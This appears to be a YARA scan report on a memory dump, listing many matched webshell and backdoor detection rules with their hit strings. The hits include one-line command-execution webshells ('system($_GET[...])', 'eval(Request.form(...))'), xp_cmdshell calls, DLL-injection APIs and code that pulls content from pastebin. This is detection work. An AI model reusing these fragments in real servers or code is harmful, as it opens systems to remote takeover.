- 0x4e8a8:$s1: `cLGet!Addr%
- 0x49b6e:$s2: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x4e8b9:$s2: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x4e90c:$s3: oQToOemBuff* <=
- 0x4e920:$s4: ionCdunAsw[Us'
- 0x4e933:$s6: CreateProcessW: %S
- 0x4e94a:$s7: ImageDirectoryEntryToData
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | dbgntboot | Webshells Auto-generated - file dbgntboot.dll | Yara Bulk Rule Generator by Florian Roth | - 0x4ea1e:$s2: now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp
- 0x4ea73:$s3: sth junk the M$ Wind0wZ retur
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PHP_shell | Webshells Auto-generated - file shell.php | Yara Bulk Rule Generator by Florian Roth | - 0x4eb47:$s0: AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz
- 0x4eb99:$s11: 1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hxdef100 | Webshells Auto-generated - file hxdef100.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4ec9e:$s0: RtlAnsiStringToUnicodeString
- 0x4ecbf:$s8: SYSTEM\CurrentControlSet\Control\SafeBoot\
- 0x4f093:$s8: SYSTEM\CurrentControlSet\Control\SafeBoot\
- 0x4ecee:$s9: \\.\mailslot\hxdef-rk100sABCDEFGH
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | rdrbs100 | Webshells Auto-generated - file rdrbs100.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4edc8:$s3: Server address must be IP in A.B.C.D format.
- 0x4edf9:$s4: mapped ports in the list. Currently
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Mithril_Mithril | Webshells Auto-generated - file Mithril.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4eedd:$s0: OpenProcess error!
- 0x4eef4:$s1: WriteProcessMemory error!
- 0x4ef12:$s4: GetProcAddress error!
- 0x4ef2c:$s5: HHt`HHt\
- 0x4ef39:$s6: Cmaudi0
- 0x4ef45:$s7: CreateRemoteThread error!
- 0x143e8:$s8: Kernel32
- 0x1457e:$s8: Kernel32
- 0x4ef63:$s8: Kernel32
- 0x4ef70:$s9: VirtualAllocEx error!
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hxdef100_2 | Webshells Auto-generated - file hxdef100.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4f040:$s0: \\.\mailslot\hxdef-rkc000
- 0x4f05e:$s2: Shared Components\On Access Scanner\BehaviourBlo
- 0x4ecbf:$s6: SYSTEM\CurrentControlSet\Control\SafeBoot\
- 0x4f093:$s6: SYSTEM\CurrentControlSet\Control\SafeBoot\
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Release_dllTest | Webshells Auto-generated - file dllTest.dll | Yara Bulk Rule Generator by Florian Roth | - 0x4f17c:$s0: ;;;Y;`;d;h;l;p;t;x;|;
- 0x4f196:$s1: 0 0&00060K0R0X0f0l0q0w0
- 0x4f1b2:$s2: : :$:(:,:0:4:8:D:`=d=
- 0x4f1cc:$s3: 4@5P5T5\5T7\7d7l7t7|7
- 0x4f1e6:$s4: 1,121>1C1K1Q1X1^1e1k1s1y1
- 0x4f204:$s5: 9 9$9(9,9P9X9\9`9d9h9l9p9t9x9|9
- 0x4f228:$s6: 0)0O0\0a0o0"1E1P1q1
- 0x4f240:$s7: <.<I<d<h<l<p<t<x<|<
- 0x4f258:$s8: 3&31383>3F3Q3X3`3f3w3|3
- 0x4f274:$s9: 8@;D;H;L;P;T;X;\;a;9=W=z=
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webadmin | Webshells Auto-generated - file webadmin.php | Yara Bulk Rule Generator by Florian Roth | - 0x4f346:$s0: <input name=\"editfilename\" type=\"text\" class=\"style1\" value='".$this->inpu
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | commands | Webshells Auto-generated - file commands.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4f44f:$s1: If CheckRecord("SELECT COUNT(ID) FROM VictimDetail WHERE VictimID = " & VictimID
- 0x4f4a4:$s2: proxyArr = Array ("HTTP_X_FORWARDED_FOR","HTTP_VIA","HTTP_CACHE_CONTROL","HTTP_F
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hkdoordll | Webshells Auto-generated - file hkdoordll.dll | Yara Bulk Rule Generator by Florian Roth | - 0x4f5af:$s6: Can't uninstall,maybe the backdoor is not installed or,the Password you INPUT is
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | r57shell_2 | Webshells Auto-generated - file r57shell.php | Yara Bulk Rule Generator by Florian Roth | - 0x4f6ba:$s2: echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Mithril_v1_45_dllTest | Webshells Auto-generated - file dllTest.dll | Yara Bulk Rule Generator by Florian Roth | - 0x4f7cf:$s3: syspath
- 0x4c0fd:$s4: \Mithril
- 0x4f7db:$s4: \Mithril
- 0x4fbdf:$s4: \Mithril
- 0x4f7e8:$s5: --list the services in the computer
- 0x50ea5:$s5: --list the services in the computer
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | dbgiis6cli | Webshells Auto-generated - file dbgiis6cli.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4f8c8:$s0: User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
- 0x4f90c:$s5: ###command:(NO more than 100 bytes!)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | remview_2003_04_22 | Webshells Auto-generated - file remview_2003_04_22.php | Yara Bulk Rule Generator by Florian Roth | - 0x4f9fd:$s1: "<b>".mm("Eval PHP code")."</b> (".mm("don't type")." \"<?\"
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_test | Webshells Auto-generated - file test.php | Yara Bulk Rule Generator by Florian Roth | - 0x370b8:$s0: $yazi = "test" . "\r\n";
- 0x4faf3:$s0: $yazi = "test" . "\r\n";
- 0x370d5:$s2: fwrite ($fp, "$yazi");
- 0x4fb10:$s2: fwrite ($fp, "$yazi");
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Debug_cress | Webshells Auto-generated - file cress.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4fbdf:$s0: \Mithril
- 0x4c067:$s4: Mithril.exe
- 0x4ee5b:$s4: Mithril.exe
- 0x4fbed:$s4: Mithril.exe
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_EFSO_2 | Webshells Auto-generated - file EFSO_2.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4fda3:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x52056:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x4fdf8:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
- 0x520ab:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | thelast_index3 | Webshells Auto-generated - file index3.php | Yara Bulk Rule Generator by Florian Roth | - 0x4ff05:$s5: $err = "<i>Your Name</i> Not Entered!</font></h2>Sorry, \"Your Name\" field is r
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | adjustcr | Webshells Auto-generated - file adjustcr.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4bbbc:$s0: $Info: This file is packed with the UPX executable packer $
- 0x5000e:$s0: $Info: This file is packed with the UPX executable packer $
- 0x5004e:$s2: $License: NRV for UPX is distributed under special license $
- 0x5008f:$s6: AdjustCR Carr
- 0x4bc11:$s7: ION\System\FloatingPo
- 0x500a1:$s7: ION\System\FloatingPo
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FeliksPack3___PHP_Shells_xIShell | Webshells Auto-generated - file xIShell.php | Yara Bulk Rule Generator by Florian Roth | - 0x50186:$s3: if (!$nix) { $xid = implode(explode("\\",$xid),"\\\\");}echo ("<td><a href='Java
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop_AppPack_2005 | Webshells Auto-generated - file 2005.asp | Yara Bulk Rule Generator by Florian Roth | - 0x50295:$s6: " onclick="this.form.sqlStr.value='e:\hytop.mdb
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | xssshell | Webshells Auto-generated - file xssshell.asp | Yara Bulk Rule Generator by Florian Roth | - 0x5037d:$s1: if( !getRequest(COMMANDS_URL + "?v=" + VICTIM + "&r=" + generateID(), "pushComma
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FeliksPack3___PHP_Shells_usr | Webshells Auto-generated - file usr.php | Yara Bulk Rule Generator by Florian Roth | - 0x50495:$s0: <?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_phpinj | Webshells Auto-generated - file phpinj.php | Yara Bulk Rule Generator by Florian Roth | - 0x401cd:$s4: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
- 0x505a0:$s4: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | xssshell_db | Webshells Auto-generated - file db.asp | Yara Bulk Rule Generator by Florian Roth | - 0x50694:$s8: '// By Ferruh Mavituna | http://ferruh.mavituna.com
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PHP_sh | Webshells Auto-generated - file sh.php | Yara Bulk Rule Generator by Florian Roth | - 0x50778:$s1: "@$SERVER_NAME ".exec("pwd")
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | xssshell_default | Webshells Auto-generated - file default.asp | Yara Bulk Rule Generator by Florian Roth | - 0x50854:$s3: If ProxyData <> "" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, "<br />")
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | EditServer_Webshell_2 | Webshells Auto-generated - file EditServer.exe | Yara Bulk Rule Generator by Florian Roth | - 0x50963:$s0: @HOTMAIL.COM
- 0x50974:$s1: Press Any Ke
- 0x50985:$s3: glish MenuZ
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | by064cli | Webshells Auto-generated - file by064cli.exe | Yara Bulk Rule Generator by Florian Roth | - 0x50a49:$s7: packet dropped,redirecting
- 0x50a68:$s9: input the password(the default one is 'by')
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Mithril_dllTest | Webshells Auto-generated - file dllTest.dll | Yara Bulk Rule Generator by Florian Roth | - 0x50b52:$s0: please enter the password:
- 0x50b71:$s3: \dllTest.pdb
- 0x50e94:$s3: \dllTest.pdb
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | peek_a_boo | Webshells Auto-generated - file peek-a-boo.exe | Yara Bulk Rule Generator by Florian Roth | - 0x50c3a:$s0: __vbaHresultCheckObj
- 0x50c53:$s1: \VB\VB5.OLB
- 0x50c63:$s2: capGetDriverDescriptionA
- 0x4cd99:$s3: __vbaExceptHandler
- 0x50c80:$s3: __vbaExceptHandler
- 0x4cdb0:$s4: EVENT_SINK_Release
- 0x50c97:$s4: EVENT_SINK_Release
- 0x50cae:$s8: __vbaErrorOverflow
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | fmlibraryv3 | Webshells Auto-generated - file fmlibraryv3.asp | Yara Bulk Rule Generator by Florian Roth | - 0x50d7f:$s3: ExeNewRs.CommandText = "UPDATE " & tablename & " SET " & ExeNewRsValues & " WHER
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Debug_dllTest_2 | Webshells Auto-generated - file dllTest.dll | Yara Bulk Rule Generator by Florian Roth | - 0x50e8e:$s4: \Debug\dllTest.pdb
- 0x4f7e8:$s5: --list the services in the computer
- 0x50ea5:$s5: --list the services in the computer
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | connector | Webshells Auto-generated - file connector.asp | Yara Bulk Rule Generator by Florian Roth | - 0x50f83:$s2: If ( AttackID = BROADCAST_ATTACK )
- 0x50faa:$s4: Add UNIQUE ID for victims / zombies
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | shelltools_g0t_root_HideRun | Webshells Auto-generated - file HideRun.exe | Yara Bulk Rule Generator by Florian Roth | - 0x51098:$s0: Usage -- hiderun [AppName]
- 0x510b7:$s7: PVAX SW, Alexey A. Popoff, Moscow, 1997.
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PHP_Shell_v1_7 | Webshells Auto-generated - file PHP_Shell_v1.7.php | Yara Bulk Rule Generator by Florian Roth | - 0x3464d:$s8: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]
- 0x511a4:$s8: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | xssshell_save | Webshells Auto-generated - file save.asp | Yara Bulk Rule Generator by Florian Roth | - 0x5128e:$s4: RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID
- 0x512e2:$s5: VictimID = fm_NStr(Victims(i))
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_phpinj_2 | Webshells Auto-generated - file phpinj.php | Yara Bulk Rule Generator by Florian Roth | - 0x514a5:$s9: <? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ZXshell2_0_rar_Folder_zxrecv | Webshells Auto-generated - file zxrecv.exe | Yara Bulk Rule Generator by Florian Roth | - 0x515a1:$s0: RyFlushBuff
- 0x515b1:$s1: teToWideChar^FiYP
- 0x515c7:$s2: mdesc+8F D
- 0x515d6:$s3: \von76std
- 0x515e4:$s4: 5pur+virtul
- 0x515f4:$s5: - Kablto io
- 0x51604:$s6: ac#f{lowi8a
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_ajan | Webshells Auto-generated - file ajan.asp | Yara Bulk Rule Generator by Florian Roth | - 0x25b28:$s4: entrika.write "BinaryStream.SaveToFile
- 0x516c6:$s4: entrika.write "BinaryStream.SaveToFile
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | c99shell | Webshells Auto-generated - file c99shell.php | Yara Bulk Rule Generator by Florian Roth | - 0x517a5:$s0: <br />Input URL: <input name=\"uploadurl\" type=\"text\"&
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | phpspy_2005_full | Webshells Auto-generated - file phpspy_2005_full.php | Yara Bulk Rule Generator by Florian Roth | - 0x518be:$s7: echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlenco
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_zehir4_2 | Webshells Auto-generated - file zehir4.asp | Yara Bulk Rule Generator by Florian Roth | - 0x519cb:$s4: "Program Files\Serv-u\Serv
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_indexer_2 | Webshells Auto-generated - file indexer.asp | Yara Bulk Rule Generator by Florian Roth | - 0x51aa4:$s5: <td>Nerden :<td><input type="text" name="nerden" size=25 value=index.html></td>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop_DevPack_2005 | Webshells Auto-generated - file 2005.asp | Yara Bulk Rule Generator by Florian Roth | - 0x51bb2:$s7: theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath("/")),"")
- 0x51c07:$s8: scrollbar-darkshadow-color:#9C9CD3;
- 0x51c2f:$s9: scrollbar-face-color:#E4E4F3;
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | _root_040_zip_Folder_deploy | Webshells Auto-generated - file deploy.exe | Yara Bulk Rule Generator by Florian Roth | - 0x51d16:$s5: halon synscan 127.0.0.1 1-65536
- 0x51d3a:$s8: Obviously you replace the ip address with that of the target.
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | by063cli | Webshells Auto-generated - file by063cli.exe | Yara Bulk Rule Generator by Florian Roth | - 0x51e30:$s2: #popmsghello,are you all right?
- 0x51e54:$s4: connect failed,check your network and remote ip.
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | icyfox007v1_10_rar_Folder_asp | Webshells Auto-generated - file asp.asp | Yara Bulk Rule Generator by Florian Roth | - 0x51f4d:$s0: <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_EFSO_2_2 | Webshells Auto-generated - file EFSO_2.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4fda3:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x52056:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x4fdf8:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
- 0x520ab:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | byshell063_ntboot_2 | Webshells Auto-generated - file ntboot.dll | Yara Bulk Rule Generator by Florian Roth | - 0x521bd:$s6: OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | u_uay | Webshells Auto-generated - file uay.exe | Yara Bulk Rule Generator by Florian Roth | - 0x522a7:$s1: exec "c:\WINDOWS\System32\freecell.exe
- 0x522d2:$s9: SYSTEM\CurrentControlSet\Services\uay.sys\Security
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | bin_wuaus | Webshells Auto-generated - file wuaus.dll | Yara Bulk Rule Generator by Florian Roth | - 0x523bb:$s1: 9(90989@9V9^9f9n9v9
- 0x523d3:$s2: :(:,:0:4:8:C:H:N:T:Y:_:e:o:y:
- 0x523f5:$s3: ;(=@=G=O=T=X=\=
- 0x52409:$s4: TCP Send Error!!
- 0x5241e:$s5: 1"1;1X1^1e1m1w1~1
- 0x52434:$s8: =$=)=/=<=Y=_=j=p=z=
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | pwreveal | Webshells Auto-generated - file pwreveal.exe | Yara Bulk Rule Generator by Florian Roth | - 0x52500:$s0: *<Blank - no es
- 0x52514:$s3: JDiamondCS
- 0x52524:$s8: sword set> [Leith=0 bytes]
- 0x52543:$s9: ION\System\Floating-
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | shelltools_g0t_root_xwhois | Webshells Auto-generated - file xwhois.exe | Yara Bulk Rule Generator by Florian Roth | - 0x52620:$s1: rting!
- 0x5262c:$s2: aTypCog(
- 0x4a2bd:$s5: Diamond
- 0x4bb9d:$s5: Diamond
- 0x4d90e:$s5: Diamond
- 0x52515:$s5: Diamond
- 0x52639:$s5: Diamond
- 0x52645:$s6: r)r=rQreryr
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | vanquish_2 | Webshells Auto-generated - file vanquish.exe | Yara Bulk Rule Generator by Florian Roth | - 0x5270b:$s2: Vanquish - DLL injection failed:
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | down_rar_Folder_down | Webshells Auto-generated - file down.asp | Yara Bulk Rule Generator by Florian Roth | - 0x527ec:$s0: response.write "<font color=blue size=2>NetBios Name: \\" & Snet.ComputerName &
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | cmdShell | Webshells Auto-generated - file cmdShell.asp | Yara Bulk Rule Generator by Florian Roth | - 0x528f5:$s1: if cmdPath="wscriptShell" then
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ZXshell2_0_rar_Folder_nc | Webshells Auto-generated - file nc.exe | Yara Bulk Rule Generator by Florian Roth | - 0x529d6:$s0: WSOCK32.dll
- 0x529e6:$s1: ?bSUNKNOWNV
- 0x529f6:$s7: p@gram Jm6h)
- 0x52a07:$s8: ser32.dllCONFP@
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | portlessinst | Webshells Auto-generated - file portlessinst.exe | Yara Bulk Rule Generator by Florian Roth | - 0x52ad7:$s2: Fail To Open Registry
- 0x52af1:$s3: f<-WLEggDr"
- 0x52b01:$s6: oMemoryCreateP
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SetupBDoor | Webshells Auto-generated - file SetupBDoor.exe | Yara Bulk Rule Generator by Florian Roth | - 0x52bcc:$s1: \BDoor\SetupBDoor
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | phpshell_3 | Webshells Auto-generated - file phpshell.php | Yara Bulk Rule Generator by Florian Roth | - 0x1b56f:$s3: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x34605:$s3: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x52c98:$s3: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x52ce0:$s5: echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | BIN_Server | Webshells Auto-generated - file Server.exe | Yara Bulk Rule Generator by Florian Roth | - 0x52de8:$s0: configserver
- 0x52df9:$s1: GetLogicalDrives
- 0x52e0e:$s2: WinExec
- 0x52e1a:$s4: fxftest
- 0x52e26:$s5: upfileok
- 0x52e33:$s7: upfileer
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop2006_rar_Folder_2006 | Webshells Auto-generated - file 2006.asp | Yara Bulk Rule Generator by Florian Roth | - 0x52f01:$s6: strBackDoor = strBackDoor
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | r57shell_3 | Webshells Auto-generated - file r57shell.php | Yara Bulk Rule Generator by Florian Roth | - 0x52fd6:$s1: <b>".$_POST['cmd']
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HDConfig | Webshells Auto-generated - file HDConfig.exe | Yara Bulk Rule Generator by Florian Roth | - 0x530a1:$s0: An encryption key is derived from the password hash.
- 0x530db:$s3: A hash object has been created.
- 0x53100:$s4: Error during CryptCreateHash!
- 0x53122:$s5: A new key container has been created.
- 0x5314c:$s6: The password has been added to the hash.
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_ajan_2 | Webshells Auto-generated - file ajan.asp | Yara Bulk Rule Generator by Florian Roth | - 0x23c3e:$s2: "Set WshShell = CreateObject(""WScript.Shell"")
- 0x5322e:$s2: "Set WshShell = CreateObject(""WScript.Shell"")
- 0x53262:$s3: /file.zip
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_and_Exploit_CN_APT_HK | Webshell and Exploit Code in relation with APT against Hong Kong protesters | Florian Roth | - 0x53353:$a0: <script language=javascript src=http://java-se.com/o.js</script>
- 0x53398:$s0: <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
- 0x53400:$s1: <input type="hidden" name="doing" value="login">
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JSP_Browser_APT_webshell | VonLoesch JSP Browser used as web shell by APT groups - jsp File browser 1.1a | F.Roth | - 0x534d3:$a1a: private static final String[] COMMAND_INTERPRETER = {"
- 0x5350f:$a1b: cmd", "/C"}; // Dos,Windows
- 0x5352f:$a2: Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));
- 0x5357b:$a3: ret.append("!!!! Process has timed out, destroyed !!!!!");
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JSP_jfigueiredo_APT_webshell | JSP Browser used as web shell by APT groups - author: jfigueiredo | F.Roth | - 0x53698:$a1: String fhidden = new String(Base64.encodeBase64(path.getBytes()));
- 0x536df:$a2: <form id="upload" name="upload" action="ServFMUpload" method="POST" enctype="multipart/form-data">
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JSP_jfigueiredo_APT_webshell_2 | JSP Browser used as web shell by APT groups - author: jfigueiredo | F.Roth | - 0x5381b:$a1: <div id="bkorotator"><img alt="" src="images/rotator/1.jpg"></div>
- 0x53862:$a2: $("#dialog").dialog("destroy");
- 0x53886:$s1: <form id="form" action="ServFMUpload" method="post" enctype="multipart/form-data">
- 0x538dd:$s2: <input type="hidden" id="fhidden" name="fhidden" value="L3BkZi8=" />
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_Insomnia | Insomnia Webshell - file InsomniaShell.aspx | Florian Roth | - 0x53a5c:$s0: Response.Write("- Failed to create named pipe:");
- 0x53a92:$s1: Response.Output.Write("+ Sending {0}<br>", command);
- 0x53acb:$s2: String command = "exec master..xp_cmdshell 'dir > \\\\127.0.0.1
- 0x53b0f:$s3: Response.Write("- Error Getting User Info<br>");
- 0x53b44:$s4: string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes,
- 0x53b8b:$s5: [DllImport("Advapi32.dll", SetLastError = true)]
- 0x53bc0:$s9: username = DumpAccountSid(tokUser.User.Sid);
- 0x53bf2:$s14: //Response.Output.Write("Opened process PID: {0} : {1}<br>", p
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SoakSoak_Infected_Wordpress | Detects a SoakSoak infected Wordpress site http://goo.gl/1GzWUX | Florian Roth | - 0x53e23:$s0: wp_enqueue_script("swfobject");
- 0x53e47:$s1: function FuncQueueObject()
- 0x53e66:$s2: add_action("wp_enqueue_scripts", 'FuncQueueObject');
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Pastebin_Webshell | Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs | Florian Roth | - 0x53f90:$s0: file_get_contents("http://pastebin.com
- 0x53fbb:$s1: xcurl('http://pastebin.com/download.php
- 0x53fe7:$s2: xcurl('http://pastebin.com/raw.php
- 0x5400e:$x0: if($content){unlink('evex.php');
- 0x54033:$x1: $fh2 = fopen("evex.php", 'a');
- 0x54056:$y0: file_put_contents($pth
- 0x54071:$y1: echo "<login_ok>
- 0x54086:$y2: str_replace('* @package Wordpress',$temp
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ASPXspy2 | Web shell - file ASPXspy2.aspx | Florian Roth | - 0x54183:$s0: string iVDT="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin
- 0x541cf:$s1: SQLExec : <asp:DropDownList runat="server" ID="FGEy" AutoPostBack="True" O
- 0x5421e:$s3: Process[] p=Process.GetProcesses();
- 0x54246:$s4: Response.Cookies.Add(new HttpCookie(vbhLn,Password));
- 0x54280:$s5: [DllImport("kernel32.dll",EntryPoint="GetDriveTypeA")]
- 0x542bb:$s6: <p>ConnString : <asp:TextBox id="MasR" style="width:70%;margin:0 8px;" CssCl
- 0x5430c:$s7: ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();
- 0x54361:$s8: Copyright © 2009 Bin -- <a href="http://www.rootkit.net.cn" target="_bla
- 0x543b4:$s10: Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.
- 0x54406:$s11: nxeDR.Command+=new CommandEventHandler(this.iVk);
- 0x5443d:$s12: <%@ import Namespace="System.ServiceProcess"%>
- 0x54471:$s13: foreach(string innerSubKey in sk.GetSubKeyNames())
- 0x544a9:$s17: Response.Redirect("http://www.rootkit.net.cn");
- 0x544de:$s20: else if(Reg_Path.StartsWith("HKEY_USERS"))
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_27_9_c66_c99 | Detects Webshell - rule generated from files 27.9.txt, c66.php, c99-shadows-mod.php, c99.php ... | Florian Roth | - 0x548fa:$s4: if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
- 0x5493e:$s6: @extract($_REQUEST["c99shcook"]);
- 0x54964:$s7: if (!function_exists("c99_buff_prepare"))
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_acid_AntiSecShell_3 | Detects Webshell Acid | Florian Roth | - 0x54f76:$s0: echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
- 0x54fcf:$s1: if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_c99_4 | Detects C99 Webshell | Florian Roth | - 0x554df:$s1: displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
- 0x55522:$s2: displaysecinfo("RAM",myshellexec("free -m"));
